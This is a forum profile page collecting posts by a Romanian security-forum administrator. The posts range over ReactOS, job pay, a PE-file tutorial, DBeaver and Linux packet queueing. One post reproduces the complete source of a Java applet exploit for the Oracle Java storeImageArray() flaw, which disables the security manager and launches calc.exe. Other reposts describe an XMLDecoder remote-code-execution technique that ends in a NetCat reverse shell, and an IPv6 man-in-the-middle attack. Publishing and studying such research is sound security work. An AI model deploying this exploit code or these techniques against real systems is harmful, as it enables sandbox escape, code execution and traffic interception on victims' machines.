Jump to content

Nytro

Administrators
  • Posts

    18785
  • Joined

  • Last visited

  • Days Won

    738

Everything posted by Nytro

  1. Da, m-am uitat si eu prin sursa, evident, nu e complet. S-a incercat rescrierea de la 0 a sistemului de operare Windows XP. Sansele de reusita sunt extrem de mici date fiind: 1. E un proiect EXTREM de complex 2. Cunostintele necesare pentru a putea colabora la proiect sunt la nivelul > avansat 3. Sunt foarte putini oameni care pot contribui si care o fac Pana sa se ajunga la o versiune stabila vor mai trece multi ani, asta daca se va continua proiectul. Insa ca utilitate, e foarte interesant sa te uiti in codul sursa si sa intelegi cum functioneaza kernelul din Windows.
  2. Am stat si eu vreo 2 minute pe geam dar nu am vazut nimic. Cam cat de des apar? Una la 5-10 minute, sau mai rar?
  3. Cum adica 24/48? Salariul cred ca esti mai mic decat minimul pe economie, nici nu cred ca e legal sa fie atat. Despre ce job e vorba? La Carrefour, Cora, Kaufland probabil e mai ok. In programare, pana si internship-urile sau part time-urile sunt platite de la 1000 RON in sus.
  4. Care era problema, ca acceptam doar proiecte facute de la 0 si nu acceptam surse copiate? De fapt, aici se da ban pentru asa ceva, nu doar ca nu se posteaza la RST Power. Fa o porcarie, dar fa-o tu, nu iei un cod de pe Google, pui pe el "by Blondas" si gata, esti programator. Bine, in cazul tau, ai luat din mai multe surse si le-ai pus intr-un loc. Adica egal cu 0, acelasi lucru.
  5. RST e pe prima pagina la cautari ca "invitatie filelist", "invitatii filelist", "cont filelist". Asa cum sunt multi utilizatori care au ajuns aici pentru "Conquiztador killer" dar care au evoluat, asa speram si ca valul de utilizatori ajunsi aici cautand asa ceva sa invete lucruri noi si sa evolueze.
  6. Researchers demonstrate how IPv6 can easily be used to perform MitM attacks Many devices simply waiting for router advertisements, good or evil. When early last year I was doing research for an article on IPv6 and security, I was surprised to learn how easy it was to set up an IPv6 tunnel into an IPv4-only environment. I expected this could easily be used in various nefarious ways. I was reminded of this when I read about a DEFCON presentation on using IPv6 to perform a man-in-the-middle attack on an IPv4-connected machine. I did not attend DEFCON, but the presenters Brent Bandelgar and Scott Behrens provided details in a blog post for their company Neohapsis as well as in their presentation slides. Moreover, they shared the source code of the tool they developed on Github. The attack refines the proof of concept of an attack possibility described in 2011, by making it also work against Windows 8 and providing a bash script that is supposed to work out-of-the-box. This script will no doubt be popular among penetration testers, but also shows possibilities for those with malicious motives. For me, the script didn't work right away, but some minor tweaks got it working, after which the traffic from my wife's Windows 7 laptop was flowing through my virtual Ubuntu server. And while I didn't even attempt to read the traffic generated by this 'husband-in-the-middle' attack, I could have done. I could also have performed a similar attack in a local Starbucks. The attack makes use of the fact that all modern operating systems support both IPv4 and IPv6 connections. This in itself is a good thing for the migration towards IPv6, as is the fact that the IPv6 connection, if available, takes precedence. Moreover, operating systems such as Windows 7 and 8 have DHCPv6, the IPv6-version of DHCP, enabled by default. This means that if they haven't already got an IPv6 connection, they will obtain one from any DHCPv6 server running on the local network. This is what the Neohapsis researchers do to get machines to connect to their device. As this merely allows them to capture IPv6 traffic in a IPv4-only network, they then use a protocol called NAT64 to allow their server to route this traffic to the IPv4-Internet. NAT64 is one of several protocols used to make the migration towards IPv6 easier: it allows IPv6-only networks to connect to IPv4-only services on the Internet. NAT64 in a rogue set-up, with the NAT64 server on the right. It works by setting up a DNS server that returns IPv6 addresses in which the IPv4 address is embedded. If a request is made for the AAAA record (IPv6 address) of a domain, the response will be an address in some predefined /96 IPv6 subnet - that is, a subnet in which all but the final 32 bits are fixed. These 32 bits will be the A record (IPv4 address) for the same domain. Say, for example, the subnet is 2001:db9:1:ffff::/96 and a request is made for Virus Bulletin : Independent Malware Advice, then the response will be 2001:db9:1:ffff::6dc8:041a. Indeed, 6dc8:041a is the hexadecimal representation of 109.200.4.26, the IPv4 address of Virus Bulletin : Independent Malware Advice. Requests to this IPv6 address will then be routed through the server running NAT64 - in this case, the server set up by the attackers. They are thus able to see all traffic from the now IPv6-connected machine, except that in which the IP address is hard-coded. Of course, in principle this means they can only read traffic that isn't encrypted, but that still allows for many possible attacks with serious consequences. At the same time, the fact that the intercepting device runs on the same local network might make performing cryptographic timing attacks such as Lucky Thirteen easier. To see the possibilities for malware that is able to intercept all traffic, one just needs to look at a 2011 variant of the TDSS rootkit which set up its own IPv4 DHCP server. In that case, however, the malware had to compete with the real DHCP server, while in this case the fact that IPv6 always takes precedence over IPv4 means there is no such competition. The simplest way to fend off this kind of attack is to turn off IPv6 on devices that do not need it. This will, of course, hinder the migration towards IPv6 and may not be an option for transportable devices, as these may sometimes find themselves in an environment where IPv6 connectivity is needed. The researchers also mention RFC6105, an informational document published by the IETF on how to deal with rogue router advertisements, as a possible defence strategy. But ultimately, the best way to defend against these kinds of attacks will be to make sure the device always has an IPv6 connection. Attacks such as this one will not work on devices that are already IPv6-connected. Sursa: Virus Bulletin : Blog - Researchers demonstrate how IPv6 can easily be used to perform MitM attacks Vedeti link-urile.
  7. Pentru ca ca codul e scris in C si nu in C++. Mirror: http://packetstormsecurity.com/files/download/122779/Formatul_Fisierelor_PE.pdf
  8. Mirror: http://www.exploit-db.com/wp-content/themes/exploit/docs/27516.pdf
  9. Oracle Java storeImageArray() Invalid Array Indexing Code Execution Site packetstormsecurity.com Oracle Java versions prior to 7u25 suffer from an invalid array indexing vulnerability that exists within the native storeImageArray() function inside jre/bin/awt.dll. This exploit code demonstrates remote code execution by popping calc.exe. It was obtained through the Packet Storm Bug Bounty program. import java.awt.image.*;import java.awt.color.*; import java.beans.Statement; import java.security.*; public class MyJApplet extends javax.swing.JApplet { /** * Initializes the applet myJApplet */ @Override public void init() { /* Set the Nimbus look and feel */ //<editor-fold defaultstate="collapsed" desc=" Look and feel setting code (optional) "> /* If Nimbus (introduced in Java SE 6) is not available, stay with the default look and feel. * For details see http://download.oracle.com/javase/tutorial/uiswing/lookandfeel/plaf.html */ try { for (javax.swing.UIManager.LookAndFeelInfo info : javax.swing.UIManager.getInstalledLookAndFeels()) { if ("Nimbus".equals(info.getName())) { javax.swing.UIManager.setLookAndFeel(info.getClassName()); break; } } } catch (ClassNotFoundException ex) { java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } catch (InstantiationException ex) { java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } catch (IllegalAccessException ex) { java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } catch (javax.swing.UnsupportedLookAndFeelException ex) { java.util.logging.Logger.getLogger(MyJApplet.class.getName()).log(java.util.logging.Level.SEVERE, null, ex); } //</editor-fold> /* Create and display the applet */ try { java.awt.EventQueue.invokeAndWait(new Runnable() { public void run() { initComponents(); // print environment info logAdd( "JRE: " + System.getProperty("java.vendor") + " " + System.getProperty("java.version") + "\nJVM: " + System.getProperty("java.vm.vendor") + " " + System.getProperty("java.vm.version") + "\nJava Plug-in: " + System.getProperty("javaplugin.version") + "\nOS: " + System.getProperty("os.name") + " " + System.getProperty("os.arch") + " (" + System.getProperty("os.version") + ")" ); } }); } catch (Exception ex) { ex.printStackTrace(); } } public void logAdd(String str) { txtArea.setText(txtArea.getText() + str + "\n"); } public void logAdd(Object o, String... str) { logAdd((str.length > 0 ? str[0]:"") + (o == null ? "null" : o.toString())); } public String errToStr(Throwable t) { String str = "Error: " + t.toString(); StackTraceElement[] ste = t.getStackTrace(); for(int i=0; i < ste.length; i++) { str += "\n\t" + ste.toString(); } t = t.getCause(); if (t != null) str += "\nCaused by: " + errToStr(t); return str; } public void logError(Exception ex) { logAdd(errToStr(ex)); } public static String toHex(int i) { return Integer.toHexString(i); } /** * This method is called from within the init() method to initialize the * form. WARNING: Do NOT modify this code. The content of this method is * always regenerated by the Form Editor. */ @SuppressWarnings("unchecked") // <editor-fold defaultstate="collapsed" desc="Generated Code">//GEN-BEGIN:initComponents private void initComponents() { btnStart = new javax.swing.JButton(); jScrollPane2 = new javax.swing.JScrollPane(); txtArea = new javax.swing.JTextArea(); btnStart.setText("Run calculator"); btnStart.addMouseListener(new java.awt.event.MouseAdapter() { public void mousePressed(java.awt.event.MouseEvent evt) { btnStartMousePressed(evt); } }); txtArea.setEditable(false); txtArea.setColumns(20); txtArea.setFont(new java.awt.Font("Arial", 0, 12)); // NOI18N txtArea.setRows(5); txtArea.setTabSize(4); jScrollPane2.setViewportView(txtArea); javax.swing.GroupLayout layout = new javax.swing.GroupLayout(getContentPane()); getContentPane().setLayout(layout); layout.setHorizontalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(layout.createSequentialGroup() .addContainerGap() .addComponent(jScrollPane2, javax.swing.GroupLayout.DEFAULT_SIZE, 580, Short.MAX_VALUE) .addContainerGap()) .addGroup(layout.createSequentialGroup() .addGap(242, 242, 242) .addComponent(btnStart, javax.swing.GroupLayout.PREFERRED_SIZE, 124, javax.swing.GroupLayout.PREFERRED_SIZE) .addContainerGap(javax.swing.GroupLayout.DEFAULT_SIZE, Short.MAX_VALUE)) ); layout.setVerticalGroup( layout.createParallelGroup(javax.swing.GroupLayout.Alignment.LEADING) .addGroup(javax.swing.GroupLayout.Alignment.TRAILING, layout.createSequentialGroup() .addContainerGap() .addComponent(jScrollPane2, javax.swing.GroupLayout.DEFAULT_SIZE, 344, Short.MAX_VALUE) .addPreferredGap(javax.swing.LayoutStyle.ComponentPlacement.UNRELATED) .addComponent(btnStart) .addContainerGap()) ); }// </editor-fold>//GEN-END:initComponents private boolean _isMac = System.getProperty("os.name","").contains("Mac"); private boolean _is64 = System.getProperty("os.arch","").contains("64"); // we will need ColorSpace which returns 1 from getNumComponents() class MyColorSpace extends ICC_ColorSpace { public MyColorSpace() { super(ICC_Profile.getInstance(ColorSpace.CS_sRGB)); } // override getNumComponents public int getNumComponents() { int res = 1; //logAdd("MyColorSpace.getNumComponents() = " + res); return res; } } // we will need ComponentColorModel with the obedient isCompatibleRaster() which always returns true. class MyColorModel extends ComponentColorModel { public MyColorModel() { super(new MyColorSpace(), new int[]{8,8,8}, false, false, 1, DataBuffer.TYPE_BYTE); } // override isCompatibleRaster public boolean isCompatibleRaster(Raster r) { boolean res = true; logAdd("MyColorModel.isCompatibleRaster() = " + res); return res; } } private int tryExpl() { try { // alloc aux vars String name = "setSecurityManager"; Object[] o1 = new Object[1]; Object o2 = new Statement(System.class, name, o1); // make a dummy call for init // allocate byte buffer for destination Raster. DataBufferByte dst = new DataBufferByte(16); // allocate the target array right after dst int[] a = new int[8]; // allocate an object array right after a[] Object[] oo = new Object[7]; // create Statement with the restricted AccessControlContext oo[2] = new Statement(System.class, name, o1); // create powerful AccessControlContext Permissions ps = new Permissions(); ps.add(new AllPermission()); oo[3] = new AccessControlContext( new ProtectionDomain[]{ new ProtectionDomain( new CodeSource( new java.net.URL("file:///"), new java.security.cert.Certificate[0] ), ps ) } ); // store System.class pointer in oo[] oo[4] = ((Statement)oo[2]).getTarget(); // save old a.length int oldLen = a.length; logAdd("a.length = 0x" + toHex(oldLen)); // create regular source image BufferedImage bi1 = new BufferedImage(4,1, BufferedImage.TYPE_INT_ARGB); logAdd(bi1); // prepare the sample model with "dataBitOffset" pointing outside dst[] onto a.length MultiPixelPackedSampleModel sm = new MultiPixelPackedSampleModel(DataBuffer.TYPE_BYTE, 4,1,1,4, 44 + (_is64 ? 8:0)); // create malformed destination image based on dst[] data WritableRaster wr = Raster.createWritableRaster(sm, dst, null); BufferedImage bi2 = new BufferedImage(new MyColorModel(), wr, false, null); logAdd(bi2); // prepare first pixel which will overwrite a.length bi1.getRaster().setPixel(0,0, new int[]{-1,-1,-1,-1}); // call the vulnerable storeImageArray() function (see ...\jdk\src\share\native\sun\awt\medialib\awt_ImagingLib.c) AffineTransformOp op = new AffineTransformOp(new java.awt.geom.AffineTransform(1,0,0,1,0,0), null); op.filter(bi1, bi2); // check results: a.length should be overwritten by 0xFFFFFFFF int len = a.length; logAdd("a.length = 0x" + toHex(len)); if (len == oldLen) { // check a[] content corruption // for RnD for(int i=0; i < len; i++) if (a != 0) logAdd("a["+i+"] = 0x" + toHex(a)); // exit logAdd("error 1"); return 1; } // ok, now we can read/write outside the real a[] storage, // lets find our Statement object and replace its private "acc" field value // search for oo[] after a[oldLen] boolean found = false; int ooLen = oo.length; for(int i=oldLen+2; i < oldLen+32; i++) if (a[i-1]==ooLen && a==0 && a[i+1]==0 // oo[0]==null && oo[1]==null && a[i+2]!=0 && a[i+3]!=0 && a[i+4]!=0 // oo[2,3,4] != null && a[i+5]==0 && a[i+6]==0) // oo[5,6] == null { // read pointer from oo[4] int stmTrg = a[i+4]; // search for the Statement.target field behind oo[] for(int j=i+7; j < i+7+64; j++){ if (a[j] == stmTrg) { // overwrite default Statement.acc by oo[3] ("AllPermission") a[j-1] = a[i+3]; found = true; break; } } if (found) break; } // check results if (!found) { // print the memory dump on error // for RnD String s = "a["+oldLen+"...] = "; for(int i=oldLen; i < oldLen+32; i++) s += toHex(a) + ","; logAdd(s); } else try { // show current SecurityManager logAdd(System.getSecurityManager(), "Security Manager = "); // call System.setSecurityManager(null) ((Statement)oo[2]).execute(); // show results: SecurityManager should be null logAdd(System.getSecurityManager(), "Security Manager = "); } catch (Exception ex) { logError(ex); } logAdd(System.getSecurityManager() == null ? "Ok.":"Fail."); } catch (Exception ex) { logError(ex); } return 0; } private void btnStartMousePressed(java.awt.event.MouseEvent evt) {//GEN-FIRST:event_btnStartMousePressed try { logAdd("===== Start ====="); // try several attempts to exploit for(int i=1; i <= 5 && System.getSecurityManager() != null; i++){ logAdd("Attempt #" + i); tryExpl(); } // check results if (System.getSecurityManager() == null) { // execute payload Runtime.getRuntime().exec(_isMac ? "/Applications/Calculator.app/Contents/MacOS/Calculator":"calc.exe"); } logAdd("===== End ====="); } catch (Exception ex) { logError(ex); } }//GEN-LAST:event_btnStartMousePressed // Variables declaration - do not modify//GEN-BEGIN:variables private javax.swing.JButton btnStart; private javax.swing.JScrollPane jScrollPane2; private javax.swing.JTextArea txtArea; // End of variables declaration//GEN-END:variables } Download: http://packetstormsecurity.com/files/download/122777/PSA-2013-0811-1-exploit.tgz Sursa: Oracle Java storeImageArray() Invalid Array Indexing Code Execution ? Packet Storm
  10. No, si cati teroristi si infractori au prins asa pisatii?
  11. ATM manufacturer pays respects to hacker who broke into its systems Both Barnaby Jack and Triton showed how white-hat hacking should be done. A tribute to the late Barnaby Jack by the company whose systems he hacked shows how hackers can really help make the world a safer place. When New Zealand hacker Barnaby Jack suddendly died last month, the Internet was awash with tributes to the man probably best known for the "jackpotting" attack on ATMs he demonstrated at the Black Hat conference in 2010. The tributes demonstrated that Jack, who was due to speak at Black Hat this year on hacking pacemakers, was both loved an respected in the security community. His sister wrote the touching words "I was always so proud. Seems I'm not the only one." Yesterday, I spotted another tribute, by Henry Schwarz of Triton. Triton produces ATMs - the very machines whose security Jack demonstrated wasn't up to date. Many in Triton's position would have ignored or denied the problem, and perhaps even attempted to prevent Jack from speaking about the hack (as happened recently to researchers who had broken security codes in expensive cars). Instead, Triton did what was the only right thing to do: the company reached out to Jack and worked with him on improving the security of its systems. Jack, too, could have made the wrong decision: it doesn't require much imagination to understand how his ATM-hacking skills could easily have made him a lot of money. But he informed the ATM vendors about the attack, worked with them to solve the issues, and delayed a presentation about it until after a patch had been rolled out. He even decided not to disclose the how-to of the attack. It isn't always easy to explain to the general public how white-hat hackers, when they go on stage and demonstrate what to most people looks like a clear criminal act, really help make the world a safer place. Perhaps we should tell them the story of Barnaby Jack and Triton. Schwarz finishes his tribute by writing "Barnaby and I started as adversaries and ended as friends. Our heartfelt condolences to his family and loved ones." We, of course, share that sentiment. Sursa: Virus Bulletin : Blog - ATM manufacturer pays respects to hacker who broke into its systems
  12. [h=3]Using XMLDecoder to execute server-side Java Code on an Restlet application (i.e. Remote Command Execution)[/h] At the DefCon REST Presentation we did last week (see slides here), after the Neo4J CSRF payload to start processes (calc and nc) on the server demo, we also showed how dangerous the Java’s XmlDecoder can be. (tldr: scroll to the end of the article to see how to create an XML file that will trigger an reverse-shell from an REST server into an attacker's box) I have to say that I was quite surprised that it was possible to execute Java code (and start processes) from XML files! Abraham and Alvaro deserve all the credit for connecting the dots between XMLDecoder and REST. Basically what happens is that the Java’s JDK has a feature called Long Term Persistence which can be used like this: As you can see by the example shown above, the Xml provided to XMLDecoder API is able to create an instance of javax.swing.JButton and invoke its methods. I can see why this is useful and why it was added to the JDK (since it allows for much better ‘Long Term Object Persistence’), BUT, in practice, what this means is that java payloads can be inserted in XML files/messages. This is already dangerous in most situations (i.e. when was the last time that you actually thought that an XML file was able to trigger code execution on a server), BUT when you add REST to the mix, we basically have a ‘Remote Code/Command Execution’ vulnerability. Awareness for this issue Although there is some awareness out there of the dangers of XMLDecode, I don’t think there is enough understanding of what is possible to do with the XML provided to the XMLDecoder . For example Is it safe to use XMLDecoder to read document files? asks: ... with the answer being spot on: Unfortunately, one really has to look for those ‘alerts’, since the main XMLDecoder info/documentation doesn’t mention them. For example the main links you get by searching for XMLDecoder: ... encourage its use: ...and provide no info on the ‘remote code execution’ feature of XMLDecoder. Connecting the Dots: Using XmlDecoder on an REST API There are two key scenarios where this ‘feature’ becomes a spectacular vulnerability: Server-side backend system that process attacker-controlled XML files using XMLDecoder REST APIs that uses XMLDecoder to create strongly type objects from the HTTP Request data And the 2nd case is is exactly what happens with Restlet REST API , which wraps XMLDecode in its org.restlet.representation.ObjectRepresentation<T> feature/class. Note how the documentation page: ... makes no reference to the dangerous use of XMLDecoder (ironically, it doesn’t even mention XMLDecoder, just that it can parse data created by XMLEncoder) How XMLDecoder is used in Restlet In Restlet the ObjectRepresentation<T> class can be used on REST methods to create objects from the HTTP request body (which is an XML string) . For example, on the PoC that we created for the DefCon presentation (based on one of RestLet source code example apps) ... I changed the code at Line 68 (which manually retrieved data from the HTTP Request data) ... into the code you can see below at line 72 ... which uses ObjectRepresentation<T> to map the HTTP Request data into an object of type Item: Note that this is exactly the capability that are provided by MVC Frameworks that automagically bind HTTP post data into Model objects. This 'feature' is the one that creates the the Model Binding Vulnerabilities which I have been talking about here, here, here, here, here, here, here and here. In fact, the XMLDecoder is is a ModelBinding Vulnerability (also called Over Posting, Mass Assignment or Auto Binding vulns) on steroids, since not only we can put data on that object, we can create completely new ones and invoke methods in them. Before you read the exploits, remember that the change I made to the code (see below) … is one that any developer could do if tasked with automatically casting the received REST XML data into Objects. In order to develop the exploits and create PoCs, I quickly wrote an O2 Platform based tool, which you can get from here: This tool: … provided a gui where these XML exploits: …could be easy sent to a running instance of the test RestLet app. Multiple examples of what can be done using the XMLDecode meta-language 1 - create item (Simple).xml - normal object creation 2 - create item (using properties).xml - object creation and calling setters 3 - create item (from var).xml - creating and using an variable 4 - create item (and more).xml - creating/invoking a complete different class 5 - create item (and calc).xml - starting cacl.exe using Java's Runtime.getRuntime() . Note that this example is VERY STEALTH since there will be no casting error thrown by the XMLDecoder conversion (the first object created in the XML execution is the one returned, which in this case is the expected one (firstResource.Item)) 6 - Process Builder - Start a Calc.xml - Create a complete different object (ProcessBuilder) which will throw an casting error ... after the process execution starts 7a - Creating a File.xml - in the target app we were using there was no webroot available with ability to render JSPs (it was a pure REST server with only REST routes). But if it there was one, and we could write to it, we could use the technique shown below to upload an JSPShell (like this one), and exploit the server from there. 7b - Creating a Class File.xml - since we can upload files, we can compile a class file locally and 'upload' it to the server 7d - execution class file - anotherExecute- calcl.xml - in this case the class file we uploaded had a method that could be used to start processes 8a - HttpResponse - return variable.xml - this is a cool technique where I found the Restlet equivalent of HttpServletresponse, so I was able to write content directly to the current browser 8b - HttpResponse - return variables.xml - which can be used to return data assigned to XMLDecoder created variables 8c - HttpResponse - return JavaProperties.xml - In this case the java.lang.getProperties values (but if this was a real app, we could use this to extract data from the database or in memory objects) 8d - Exploit - Create XSS.xml - another option is to trigger XSS on the current user (usefully if the first payload was delivered over CSRF to the victim) 8e - HttpResponse - execute process - read two lines.xml - here is a way to execute a process and get its output shown in the browser 9a - download NetCat.xml - here is how to trigger a http connection from the server into the attacker's box and download the NetCat tool 9b - Start NetCat reverse shell.xml - once NetCat is available on the server, we can use it to send a reverse-shell an external IP:Port This is when I run out of time for writing more PoCs.... ... but as you can see by the end, I was just about writing Java code, only thing I didn’t figure out how to do create loops and anonymous methods/classes (need to look at the Command Pattern). I also hope that by now you see how dangerous the XMLDecoder capabilities are, and how its use must be VERY VERY carefully analysed and protected. How to use XMLDecoder be safely? I’m not entirely sure at the moment. The Secure Coding Guidelines for the Java Programming Language, Version 4.0 have a note on 'Long Term Persistence of JavaBeans': But the Long Term Persistence of JavaBeans Components: XML Schema article (which btw is the best resource out there on how to use the XmlDecoder), has no mention of Security. Hopefully the presentation that we did at DefCon and blog posts like this, will raise the awareness of this issue and good solutions will emerge Note that I’m not as good in Java as I am in .NET, so I’m sure there is something in Java or JDK that I’m missing. Let me know what you think of this issue, if there are safe ways to use XmlDecoder and if you spot other dangerous uses of XmlDecoder. UPDATE: Presentation slides See this page for the presentation slides (hosted by SlideShare) Dinis Cruz at 13:33 Sursa: Dinis Cruz Blog: Using XMLDecoder to execute server-side Java Code on an Restlet application (i.e. Remote Command Execution)
  13. @Byte-ul Trebuia sa dau licenta in aceasta vara, insa nu am luat toate examenele, deci mai am de asteptat. Nu pot spune in ce consta, doar pot spune ca are legatura cu fisierele PE. Cand va fi gata, probabil in iarna, daca nu imi voi schimba tema, o voi posta aici cu toate informatiile necesare. @bobi_m6 Mersi de sfaturi, voi tine cont de ele cand voi redacta versiunea finala a teoriei pentru licenta. Practic nu arata chiar asa la inceput, nu era atat de "personala", dar am transformat-o practic in tutorial pentru a intelege mai bine toata lumea. @Matt Aceasta este versiunea finala. Nu este un articol complet despre ceea ce inseamna "structura PE", dar sper ca pe viitor sa scriu si o a doua parte in care sa aduc completarile necesare.
  14. [RST] Tutorial - Formatul fisierelor PE Acest tutorial e practic o parte din "teoria" pentru lucrarea mea de licenta. Articolul nu este complet, se adreseaza incepatorilor si sper ca toata lumea va intelege despre ce e vorba. V-ati intrebat vreodata ce contine un fisier executabil (.exe) sau o biblioteca de functii (.dll)? Aici veti gasi cateva notiuni de baza. Continut: - Format general - Headerul MS-DOS - Programul MS-DOS - Headerele PE - Tabelul de sectiuni Daca aveti intrebari, nu ezitati sa le postati. Download: https://rstforums.com/proiecte/Formatul_Fisierelor_PE.pdf http://www.exploit-db.com/wp-content/themes/exploit/docs/27516.pdf http://packetstormsecurity.com/files/download/122779/Formatul_Fisierelor_PE.pdf Thanks
  15. Probabil a fost fortat de catre "baietii veseli"... Incet, incet pierdem controlul asupra a ceea ce in trecut era "lumea noastra".
  16. DBeaver - Universal Database Manager Overview DBeaver is free and open source (GPL) universal database tool for developers and database administrators. Usability is the main goal of this project, program UI is carefully designed and implemented. It is freeware. It is multiplatform. It is based on opensource framework and allows writing of various extensions (plugins). It supports any database having a JDBC driver. It may handle any external datasource which may or may not have a JDBC driver. There is a set of plugins for certain databases (MySQL and Oracle in version 1.x) and different database management utilities (e.g. ERD). Supported (tested) databases: MySQL Oracle PostgreSQL IBM DB2 Microsoft SQL Server Sybase ODBC Java DB (Derby) Firebird (Interbase) HSQLDB SQLite Mimer H2 IBM Informix SAP MAX DB Cache Ingres Linter Teradata Vertica Any JDBC compliant data source Supported OSes: Windows (2000/XP/2003/Vista/7) Linux Mac OS Solaris AIX HPUX General features: Database metadata browse Metadata editor (tables, columns, keys, indexes) SQL statements/scripts execution SQL highlighting (specific for each database engine) Autocompletion and metadata hyperlinks in SQL editor Result set/table edit BLOB/CLOB support (view and edit modes) Scrollable resultsets Data (tables, query results) export Transactions management Database objects (tables, columns, constraints, procedures) search ER diagrams Database object bookmarks SQL scripts management Projects (connections, SQL scripts and bookmarks) MySQL plugin features: Enum/Set datatypes Procedures/triggers view Metadata DDL view Session management Users management Catalogs management Advanced metadata editor Oracle plugin features: XML, Cursor datatypes support Packages, procedures, triggers, indexes, tablespaces and other metadata objects browse/edit Metadata DDL view Session management Users management Advanced metadata editor Other Benefits: DBeaver consumes much less memory than other popular similar software (SQuirreL, DBVisualizer) Database metadata is loaded on demand and there is no long-running “metadata caching” procedure at connect time ResultSet viewer (grid) is very fast and consumes very little ammount of memory All remote database operations work in non-blocking mode so DBeaver does not hang if the database server does not respond or if there is a related network issue License DBeaver is free software; you can redistribute it and/or modify it under the terms of the GNU Lesser General Public License as published by the Free Software Foundation; either version 2.1 of the License, or (at your option) any later version. DBeaver is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. License full version Contacts Technical support – support@jkiss.org Technical support, feature suggestions and any other questions – serge@jkiss.org Download: http://dbeaver.jkiss.org/download/ Sursa: DBeaver - Universal Database Manager
  17. Queueing in the Linux Network Stack [A slightly shorter and edited version of this article appeared in the July 2013 issue of Linux Journal. Thanks to Linux Journal's great copyright policy I'm still allowed to post this on my site. Go here to subscribe to Linux Journal.] Packet queues are a core component of any network stack or device. They allow for asynchronous modules to communicate, increase performance and have the side affect of impacting latency. This article aims to explain where IP packets are queued in the Linux network stack, how interesting new latency reducing features such as BQL operate and how to control buffering for reduced latency. The figure below will be referenced throughout and modified versions presented to illustrate specific concepts. Figure 1 – Simplified high level overview of the queues on the transmit path of the Linux network stack Driver Queue (aka ring buffer) Between the IP stack and the network interface controller (NIC) lies the driver queue. This queue is typically implemented as a first-in, first-out (FIFO) ring buffer – just think of it as a fixed sized buffer. The driver queue does not contain packet data. Instead it consists of descriptors which point to other data structures called socket kernel buffers (SKBs) which hold the packet data and are used throughout the kernel. Figure 2 – Partially full driver queue with descriptors pointing to SKBs The input source for the driver queue is the IP stack which queues complete IP packets. The packets may be generated locally or received on one NIC to be routed out another when the device is functioning as an IP router. Packets added to the driver queue by the IP stack are dequeued by the hardware driver and sent across a data bus to the NIC hardware for transmission. The reason the driver queue exists is to ensure that whenever the system has data to transmit, the data is available to the NIC for immediate transmission. That is, the driver queue gives the IP stack a location to queue data asynchronously from the operation of the hardware. One alternative design would be for the NIC to ask the IP stack for data whenever the physical medium is ready to transmit. Since responding to this request cannot be instantaneous this design wastes valuable transmission opportunities resulting in lower throughput. The opposite approach would be for the IP stack to wait after a packet is created until the hardware is ready to transmit. This is also not ideal because the IP stack cannot move on to other work. Huge Packets from the Stack Most NICs have a fixed maximum transmission unit (MTU) which is the biggest frame which can be transmitted by the physical media. For Ethernet the default MTU is 1,500 bytes but some Ethernet networks support Jumbo Frames of up to 9,000 bytes. Inside IP network stack, the MTU can manifest as a limit on the size of the packets which are sent to the device for transmission. For example, if an application writes 2,000 bytes to a TCP socket then the IP stack needs to create two IP packets to keep the packet size less than or equal to a 1,500 MTU. For large data transfers the comparably small MTU causes a large number of small packets to be created and transferred through the driver queue. In order to avoid the overhead associated with a large number of packets on the transmit path, the Linux kernel implements several optimizations: TCP segmentation offload (TSO), UDP fragmentation offload (UFO) and generic segmentation offload (GSO). All of these optimizations allow the IP stack to create packets which are larger than the MTU of the outgoing NIC. For IPv4, packets as large as the IPv4 maximum of 65,536 bytes can be created and queued to the driver queue. In the case of TSO and UFO, the NIC hardware takes responsibility for breaking the single large packet into packets small enough to be transmitted on the physical interface. For NICs without hardware support, GSO performs the same operation in software immediately before queueing to the driver queue. Recall from earlier that the driver queue contains a fixed number of descriptors which each point to packets of varying sizes, Since TSO, UFO and GSO allow for much larger packets these optimizations have the side effect of greatly increasing the number of bytes which can be queued in the driver queue. Figure 3 illustrates this concept in contrast with figure 2. Figure 3 – Large packets can be sent to the NIC when TSO, UFO or GSO are enabled. This can greatly increase the number of bytes in the driver queue. While the rest of this article focuses on the transmit path it is worth noting that Linux also has receive side optimizations which operate similarly to TSO, UFO and GSO. These optimizations also have the goal of reducing per-packet overhead. Specifically, generic receive offload (GRO) allows the NIC driver to combine received packets into a single large packet which is then passed to the IP stack. When forwarding packets, GRO allows for the original packets to be reconstructed which is necessary to maintain the end-to-end nature of IP packets. However, there is one side affect, when the large packet is broken up on the transmit side of the forwarding operation it results in several packets for the flow being queued at once. This ‘micro-burst’ of packets can negatively impact inter-flow latencies. Starvation and Latency Despite its necessity and benefits, the queue between the IP stack and the hardware introduces two problems: starvation and latency. If the NIC driver wakes to pull packets off of the queue for transmission and the queue is empty the hardware will miss a transmission opportunity thereby reducing the throughput of the system. This is referred to as starvation. Note that an empty queue when the system does not have anything to transmit is not starvation – this is normal. The complication associated with avoiding starvation is that the IP stack which is filling the queue and the hardware driver draining the queue run asynchronously. Worse, the duration between fill or drain events varies with the load on the system and external conditions such as the network interface’s physical medium. For example, on a busy system the IP stack will get fewer opportunities to add packets to the buffer which increases the chances that the hardware will drain the buffer before more packets are queued. For this reason it is advantageous to have a very large buffer to reduce the probability of starvation and ensures high throughput. While a large queue is necessary for a busy system to maintain high throughput, it has the downside of allowing for the introduction of a large amount of latency. Figure 4 – Interactive packet (yellow) behind bulk flow packets (blue) Figure 4 shows a driver queue which is almost full with TCP segments for a single high bandwidth, bulk traffic flow (blue). Queued last is a packet from a VoIP or gaming flow (yellow). Interactive applications like VoIP or gaming typically emit small packets at fixed intervals which are latency sensitive while a high bandwidth data transfer generates a higher packet rate and larger packets. This higher packet rate can fill the buffer between interactive packets causing the transmission of the interactive packet to be delayed. To further illustrate this behaviour consider a scenario based on the following assumptions: A network interface which is capable of transmitting at 5 Mbit/sec or 5,000,000 bits/sec. Each packet from the bulk flow is 1,500 bytes or 12,000 bits. Each packet from the interactive flow is 500 bytes. The depth of the queue is 128 descriptors There are 127 bulk data packets and 1 interactive packet queued last. Given the above assumptions, the time required to drain the 127 bulk packets and create a transmission opportunity for the interactive packet is (127 * 12,000) / 5,000,000 = 0.304 